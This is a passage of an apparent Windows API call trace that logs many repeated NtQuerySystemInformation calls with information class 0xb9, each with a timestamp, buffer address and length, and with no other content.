NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd800, Length=0x38, ResultLength=0x0) [0234.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd800, Length=0x38, ResultLength=0x0) [0234.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd800, Length=0x38, ResultLength=0x0) [0234.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd800, Length=0x38, ResultLength=0x0) [0234.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd800, Length=0x38, ResultLength=0x0) [0234.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd800, Length=0x38, ResultLength=0x0) [0234.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8e0, Length=0x40, ResultLength=0x0) [0234.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8e0, Length=0x40, ResultLength=0x0) [0234.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd800, Length=0x38, ResultLength=0x0) [0234.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd800, Length=0x38, ResultLength=0x0) [0234.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd800, Length=0x38, ResultLength=0x0) [0234.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd800, Length=0x38, ResultLength=0x0) [0234.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd800, Length=0x38, ResultLength=0x0) [0234.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 